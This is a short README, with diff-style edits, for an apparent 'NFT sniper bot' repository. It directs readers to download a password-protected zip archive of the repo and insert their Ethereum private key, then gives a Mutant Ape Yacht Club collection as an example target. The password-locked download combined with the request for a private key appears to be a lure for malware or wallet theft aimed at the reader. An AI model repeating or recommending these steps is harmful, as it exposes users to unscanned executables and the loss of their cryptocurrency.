EDavis66/nft-sniper-bot/README.md

 1. [Download](https://github.com/EDavis66/nft-sniper-bot/archive/refs/heads/main.zip) repo archive and extract files with password `ab23e23a6dc56a1a630`

 2. Insert you ETH private key.
-Dont type your seed phrase!
+Dont use your main account or seed phrase!
 Specified key required for Web3 interactions.

 3. You need specify collection name and price in ETH.
 For example we want to snipe `https://opensea.io/collection/mutant-ape-yacht-club`.
 Collection name is `mutant-ape-yacht-club`.
 Price will be lower than floor `26.69` ETH.
 Optimal sniping price is 5-10% below floor.